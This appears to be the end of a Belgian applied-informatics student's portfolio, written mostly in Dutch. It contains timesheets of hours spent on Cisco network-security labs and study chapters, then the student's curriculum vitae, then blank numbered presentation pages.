Alles in een document plaatsen Thuis 21/jan 9.10 u. 11.30 u. 2.20 u. 292.20 u.
Bijkomende zaken maken, onderandere bibliografie, inhoudstafel, enz …
Thuis 21/jan 12.10 u. 18.30 u. 6.20 u. 298.40 u.
Bijkomende zaken maken, onderandere bibliografie, inhoudstafel, enz …
Thuis 21/jan 19.00 u. 21.00 u. 2.00 u. 300.40 u.
Omzetten naar PDF formaat Thuis 22/jan 9.20 u. 10.10 u. 0.50 u. 301.30 u.
Laten afprinten Halle 22/jan 16.00 u. 17.20 u. 1.20 u. 302.50 u.
Totaal aantal gespendeerde uren: 302.50 u.
2 Tijdstabel Netwerk Security Tijdstabel Nathan Boone
Tijbesteding Plaats Dag Beginuur Einduur Gespendeerde uren Totaal uren
144
Uitleg gekregen over Cisco Configuration Professional (CCP)
School 2/okt 18.00 u. 20.00 u. 2.00 u. 2.00 u.
CCP uitgeprobeert maar mislukt School 3/okt 18.00 u. 20.00 u. 2.00 u. 4.00 u.
CCP geconfigureert en gelukt School 9/okt 18.00 u. 20.00 u. 2.00 u. 6.00 u.
Uitleg gekregen over IPv6 School 10/okt 18.00 u. 19.15 u. 1.15 u. 7.15 u.
Portfolio Netwerksecurity: CCP Thuis 11/okt 10.00 u. 11.30 u. 1.30 u. 8.45 u.
Portfolio Netwerksecurity: Lab2 Researching Network Attacks and Security Audit Tools
School 11/okt 14.00 u. 15.00 u. 1.00 u. 9.45 u.
Portfolio Netwerksecurity: Lab2 Researching Network Attacks and Security Audit Tools
School 14/okt 18.00 u. 19.15 u. 1.15 u. 11.00 u.
Portfolio Netwerksecurity: Lab2 Researching Network Attacks and Security Audit Tools
School 16/okt 18.00 u. 19.15 u. 1.15 u. 12.15 u.
Portfolio Netwerksecurity: Chapter 3 lab A: Securing Administratice Access Using AAA and Radius
Thuis 17/okt 20.00 u. 22.00 u. 2.00 u. 14.15 u.
Uitleg gekregen over verschillende VPN's en een site to site VPN ingesteld met Menr Rooseleer
School 23/okt 18.00 u. 20.00 u. 2.00 u. 16.15 u.
Uitleg gekregen over verschillende soorten Firewall's
School 24/okt 18.00 u. 19.15 u. 1.15 u. 17.30 u.
Maken van labo: Chapter 3 lab A: Securing Administratice Access Using AAA and Radius
School 6/nov 18.00 u. 19.15 u. 1.15 u. 18.45 u.
Portfolio Netwerksecurity: Chapter 3 lab A: Securing Administratice Access Using AAA and Radius
Thuis 7/nov 10.00 u. 11.00 u. 1.00 u. 19.45 u.
Maken van labo: Chapter 3 lab A: Securing Administratice Access Using AAA and Radius
School 7/nov 18.00 u. 20.25 u. 2.25 u. 22.10 u.
145
Portfolio Netwerksecurity: Chapter 3 lab A: Securing Administratice Access Using AAA and Radius
Thuis 7/nov 21.45 u. 22.30 u. 0.45 u. 22.55 u.
Maken van labo: Chapter 3 lab A: Securing Administratice Access Using AAA and Radius
School 13/nov 18.00 u. 19.15 u. 1.15 u. 24.10 u.
Maken van labo: Chapter 4 lab A: CBA and Zone Based Firewall
School 20/nov 18.00 u. 19.15 u. 1.15 u. 25.25 u.
Maken van labo: Chapter 4 lab A: CBA and Zone Based Firewall
School 21/nov 11.00 u. 13.00 u. 2.00 u. 27.25 u.
Portfolio Netwerksecurity: Chapter 3 lab A: Securing Administratice Access Using AAA and Radius
School 21/nov 18.00 u. 20.15 u. 2.15 u. 29.40 u.
Examen chapter1 : Implementing Network Security Thuis 26/nov 11.10 u. 11.40 u. 0.30 u. 30.10 u.
Maken van labo: Chapter 5 lab A: Configuring IPS using CLI and CLI
School 27/nov 16.00 u. 18.00 u. 2.00 u. 32.10 u.
Maken van labo: Chapter 5 lab A: Configuring IPS using CLI and CLI
School 28/nov 18.00 u. 19.15 u. 1.15 u. 33.25 u.
Maken van labo: Chapter 6 lab A: Securing layer 2 switches
School 3/dec 15.00 u. 18.00 u. 3.00 u. 36.25 u.
Maken van labo: Chapter 7 lab A: Exploring encryption methods
School 4/dec 12.00 u. 13.00 u. 1.00 u. 37.25 u.
Maken van labo: Chapter 8 lab A: Configuring Site-to-site VPN using Cisco IOS
School 4/dec 14.00 u. 16.00 u. 2.00 u. 39.25 u.
Maken van labo: Chapter 8 lab B: Configuring Remote Access VPN Server and Client
School 4/dec 16.00 u. 18.30 u. 2.30 u. 41.55 u.
Maken van labo: Chatper 8 lab C: Configuring a Remote Accesss VPN Server and Client
School 5/dec 10.00 u. 13.00 u. 3.00 u. 44.55 u.
Configureren van Access Point 1200 en Security instellen
School 5/dec 14.30 u. 17.30 u. 3.00 u. 47.55 u.
146
Maken van labo: Chapter 10 lab A: Confguring ASA Basic Settings and Firewall using CLI
School 5/dec 17.30 u. 18.00 u. 0.30 u. 48.25 u.
Maken van labo: Chapter 10 lab A: Confguring ASA Basic Settings and Firewall using CLI
School 6/dec 10.00 u. 12.30 u. 2.30 u. 50.55 u.
Maken van labo: Chapter 10 lab B: Configuring ASA Basic Settings and Firewall Using ASDM
Schol 6/dec 13.20 u. 14.40 u. 1.20 u. 52.15 u.
Maken van labo: Chapter 10 lab B: Configuring ASA Basic Settings and Firewall Using ASDM
School 6/dec 15.40 u. 17.15 u. 1.35 u. 53.50 u.
Leren van hoofdstuk 1: Networking Security Consepts
Thuis 7/dec 11.10 u. 12.00 u. 0.50 u. 54.40 u.
Leren van hoofdstuk 2: Understanding Security Policies Using a Lifecyce Approach
Thuis 7/dec 14.00 u. 14.50 u. 0.50 u. 55.30 u.
Leren van hoofdstuk 3: Building a Security Strategy Thuis 7/dec 15.00 u. 16.10 u. 1.10 u. 56.40 u.
Leren van hoofdstuk 4: Network Foundation Protection
Thuis 7/dec 16.15 u. 17.30 u. 1.15 u. 57.55 u.
Leren van hoofdstuk 5: Using Cisco Configuration Professional to Protect the Network Infrastucture
Thuis 8/dec 17.00 u. 17.30 u. 0.30 u. 58.25 u.
Leren van hoofdstuk 5: Using Cisco Configuration Professional to Protect the Network Infrastucture
Thuis 9/dec 11.15 u. 11.40 u. 0.25 u. 58.50 u.
Maken van labo: Chapter 10 lab C: Configuring Clientless and ANyConnect Remote Access SSL VPN's Using ASDM
School 9/dec 14.30 u. 17.10 u. 2.40 u. 61.30 u.
Maken van labo: Chapter 10 lab D: Configuring a Site-to-Site Ipsec VPN Using CCP and ASDM
School 9/dec 17.15 u. 18.00 u. 0.45 u. 62.15 u.
Maken van labo: Chatper 2 Securing the Router for Administratice Access
School 9/dec 18.00 u. 19.20 u. 1.20 u. 63.35 u.
Leren van hoofdstuk 5: Using Cisco Configuration Professional to Protect the Network Infrastucture
Thuis 9/dec 21.10 u. 21.35 u. 0.25 u. 64.00 u.
147
Leren van hoofdstuk 6: Securing the Management Plane on Cisco IOS Devices
Thuis 9/dec 22.00 u. 23.10 u. 1.10 u. 65.10 u.
Leren van hoofdstuk 6: Securing the Management Plane on Cisco IOS Devices
Thuis 10/dec 9.10 u. 9.30 u. 0.20 u. 65.30 u.
Leren van hoofdstuk 7: Implementing AAA Using IOS and the ACS Server
Thuis 10/dec 10.00 u. 11.30 u. 1.30 u. 67.00 u.
Examen chapter 2: Implementing Network Security Thuis 10/dec 12.00 u. 12.30 u. 0.30 u. 67.30 u.
Examen chapter 3: Implementing Network Security Thuis 10/dec 13.15 u. 13.45 u. 0.30 u. 68.00 u.
Leren van hoofdstuk 8: Securing Layer 2 Technologies
Thuis 10/dec 14.00 u. 15.00 u. 1.00 u. 69.00 u.
Leren van hoofdstuk 8: Securing Layer 2 Technologies
Thuis 10/dec 16.00 u. 16.45 u. 0.45 u. 69.45 u.
Leren van hoofdstuk 9: Securing the Data Plane in IPv6
Trein 11/dec 8.00 u. 8.40 u. 0.40 u. 70.25 u.
Leren van hoofdstuk 9: Securing the Data Plane in IPv6
Thuis 11/dec 12.00 u. 13.00 u. 1.00 u. 71.25 u.
Leren van hoofdstuk 10: Planning a Threat Control Strategy
Thuis 11/dec 15.00 u. 16.15 u. 1.15 u. 72.40 u.
Leren van hoofdstuk 11: Using Access Control Lists for Threat Mititgation
Thuis 11/dec 16.30 u. 18.00 u. 1.30 u. 74.10 u.
Leren van hoofdstuk 12: Understanding Firewall Fundamentals
Thuis 11/dec 19.50 u. 20.30 u. 0.40 u. 74.50 u.
Leren van hoofdstuk 12: Understanding Firewall Fundamentals
School 12/dec 10.50 u. 11.20 u. 0.30 u. 75.20 u.
Leren van hoofdstuk 12: Understanding Firewall Fundamentals
School 12/dec 14.00 u. 16.00 u. 2.00 u. 77.20 u.
148
Leren van hoofdstuk 12: Understanding Firewall Fundamentals
Thuis 12/dec 19.50 u. 20.30 u. 0.40 u. 78.00 u.
Leren van hoofdstuk 13: Implementing Cisco IOS Zone-Based Firewalls
Thuis 12/dec 20.30 u. 21.30 u. 1.00 u. 79.00 u.
Leren van hoofdstuk 13: Implementing Cisco IOS Zone-Based Firewalls
Thuis 13/dec 11.30 u. 12.10 u. 0.40 u. 79.40 u.
Leren van hoofdstuk 14: Configuring Basic Firewall Policies on Cisco ASA
Thuis 13/dec 13.50 u. 14.30 u. 0.40 u. 80.20 u.
Leren van hoofdstuk 14: Configuring Basic Firewall Policies on Cisco ASA
Bus 14/dec 12.10 u. 13.00 u. 0.50 u. 81.10 u.
Leren van hoofdstuk 14: Configuring Basic Firewall Policies on Cisco ASA
Thuis 15/dec 11.00 u. 11.30 u. 0.30 u. 81.40 u.
Leren van hoofdstuk 15: Cisco IPS/IDS Fundamentals
Thuis 15/dec 14.10 u. 15.20 u. 1.10 u. 82.50 u.
Leren van hoofdstuk 15: Cisco IPS/IDS Fundamentals
Trein 16/dec 12.00 u. 12.30 u. 0.30 u. 83.20 u.
Leren van hoofdstuk 16: Implementing IOS-Based IPS
Trein 16/dec 12.30 u. 12.40 u. 0.10 u. 83.30 u.
Leren van hoofdstuk 16: Implementing IOS-Based IPS
Thuis 16/dec 13.00 u. 14.00 u. 1.00 u. 84.30 u.
Leren van hoofdstuk 17: Fundamentals of VPN Technology
Thuis 16/dec 14.10 u. 14.30 u. 0.20 u. 84.50 u.
Leren van hoofdstuk 17: Fundamentals of VPN Technology
Thuis 16/dec 15.10 u. 16.00 u. 0.50 u. 85.40 u.
Leren van hoofdstuk 17: Fundamentals of VPN Technology
Thuis 16/dec 17.00 u. 18.10 u. 1.10 u. 86.50 u.
Leren van hoofdstuk 18: Fundamentals of the Public Key Infrastructure
Thuis 17/dec 10.00 u. 10.30 u. 0.30 u. 87.20 u.
149
Leren van hoofdstuk 18: Fundamentals of the Public Key Infrastructure
Thuis 17/dec 11.00 u. 12.10 u. 1.10 u. 88.30 u.
Leren van hoofdstuk 18: Fundamentals of the Public Key Infrastructure
Thuis 17/dec 14.20 u. 15.10 u. 0.50 u. 89.20 u.
Leren van hoofdstuk 19: Fundamentals of IP Security
Thuis 17/dec 16.00 u. 16.20 u. 0.20 u. 89.40 u.
Leren van hoofdstuk 19: Fundamentals of IP Security
Thuis 17/dec 16.30 u. 17.00 u. 0.30 u. 90.10 u.
Leren van hoofdstuk 20: Implementing IPSec Site-to-Site VPN's
Thuis 17/dec 17.20 u. 18.30 u. 1.10 u. 91.20 u.
Leren van hoofdstuk 20: Implementing IPSec Site-to-Site VPN's
Thuis 17/dec 19.10 u. 20.30 u. 1.20 u. 92.40 u.
Leren van hoofdstuk 21: Implementing SSL VPNs Using Cisco ASA
Thuis 18/dec 9.10 u. 10.20 u. 1.10 u. 93.50 u.
Leren van hoofdstuk 21: Implementing SSL VPNs Using Cisco ASA
Thuis 18/dec 10.30 u. 11.10 u. 0.40 u. 94.30 u.
Totaal aantal gespendeerde uren 94.30 u.
150
Curriculum Vitae Nathan Boone
Name: Nathan Boone
Address: Moensberg 93
Place of residence: 1180 UKKEL
Country: Belgium
Tel. / cellphone: 023 75 04 85, 0479 76 29 77
E-mail: [email protected]
Date of Birth: 25/12/1993
Driver license: B
EDUCATION
Bachelor of Applied Informatics: Degree to be obtained in June 2014
Currently in my 3th Bachelor Year at University College Brussels
Main modules studied so far
Computer networks:
Courses o Cisco course: Networking for Home and Small Businesses o Cisco course: Working at a Small-to-Medium Business o Cisco course: Introducing Routing and Switching in the Enterprise o Cisco course: Designing and Supporting Computer Networks o Cisco course: Network Security
Used software o Cisco Packet Tracer: Network simulation tool o Wireshark: Network analyzing tool o
Computer infrastructure:
Linux o Created a server park o Passion working with Debian and Linux mint o Linux Scripting
Windows o Windows Server 2008 R2 o PowerShell Scripting
151
Databases
Microsoft o Transact SQL o SQL Server Management Studio
Oracle o Oracle SQL o Oracle Apex
Software Design
Languages o C# o HTML o CSS o JavaScript
Used Software o Microsoft Visual Studio 2012: Programing tool o Aptana Studio: Web development tool
LANGUAGE SKILLS
Speaking Writing Listening
Dutch Native Speaker Native Speaker Native Speaker
English Excellent Excellent Excellent
French Good Good Excellent
German Fair Fair Fair
RELATED BUSINESS SUBJECTS
Microsoft software
Microsoft Word
Microsoft Publisher
Microsoft PowerPoint
Microsoft Excel
Microsoft Access
Microsoft Visio
152
EXTRACURRICULAR ACTIVITIES
French communication skills: I worked as a monitor for young children at various playgrounds 2009-2010-2011-2012). I improved my French communication skills and also learned the importance of team skills.
Entrepreneurial skills: I boosted my entrepreneurial skills as together with friends I founded a learning company in 2010. We created and managed a learning company as a project. We actually we imported and sold champagne to local companies and individuals.
In the summer of 2013, I worked in the company Elco, a multinational in heating solutions. I learned about the structure of a multination corporation.
Sports: tennis and football. Again this helps to work in a team, to persevere and to be ambitious.
153
De presentatie
154
155
156
157
158
159
160
161
162
163
164
